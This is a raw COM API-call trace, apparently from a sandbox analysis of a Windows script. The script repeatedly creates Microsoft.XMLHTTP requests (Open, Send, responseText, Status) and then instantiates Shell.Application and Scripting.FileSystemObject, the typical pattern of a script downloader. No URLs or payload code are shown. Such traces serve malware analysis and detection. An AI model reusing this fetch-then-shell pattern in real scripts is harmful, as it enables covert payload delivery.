	[0629.791] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0629.791] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0629.791] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0629.791] ??2@YAPEAX_K@Z () returned 0x62f310
	[0629.791] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0629.791] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0629.791] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0629.791] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0629.792] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0629.792] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0629.792] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0629.792] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0629.792] longjmp () 
	[0629.792] longjmp () 
	[0629.792] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0629.792] SysStringLen (param_1=0x0) returned 0x0
	[0629.792] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0629.793] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0629.793] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0629.793] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0629.793] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7518) returned 0x0
	[0629.793] ??2@YAPEAX_K@Z () returned 0x62f330
	[0629.793] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7518, pUnkSite=0x62f330) 
	[0629.793] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0629.793] XMLHTTPRequest:IUnknown:Release (This=0x49c7518) returned 0x0
	[0629.793] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0629.793] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0629.793] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0629.793] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0629.793] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0629.794] longjmp () 
	[0629.794] longjmp () 
	[0629.794] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0629.794] SysStringLen (param_1=0x0) returned 0x0
	[0629.794] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0629.794] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0629.794] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0629.794] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0629.794] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0629.794] ??2@YAPEAX_K@Z () returned 0x62f310
	[0629.794] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f310) 
	[0629.794] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0629.795] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0629.795] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0629.795] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0629.795] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0629.795] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0629.795] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0629.795] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0629.795] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0629.795] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0632.969] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0632.969] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0632.969] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0632.970] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0632.970] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0632.970] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0632.970] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0632.970] SysStringLen (param_1=0x0) returned 0x0
	[0632.970] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0632.970] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0632.970] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0632.971] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0632.971] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0632.971] ??2@YAPEAX_K@Z () returned 0x62f350
	[0632.971] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0632.971] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0632.971] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0632.971] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0632.971] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0632.971] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0632.971] SysStringLen (param_1=0x0) returned 0x0
	[0632.971] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0632.974] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0632.974] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0632.974] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0632.974] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0632.974] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0632.975] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0635.553] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0635.554] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0635.554] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0635.555] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0635.555] SysStringLen (param_1=0x0) returned 0x0
	[0635.555] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0635.555] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0635.556] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0635.556] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0635.556] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0635.556] ??2@YAPEAX_K@Z () returned 0x62f310
	[0635.556] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0635.556] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0635.556] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0635.556] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0635.556] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0635.556] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0635.556] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0635.559] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0635.559] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0635.559] SysStringLen (param_1=0x0) returned 0x0
	[0635.559] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0635.559] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
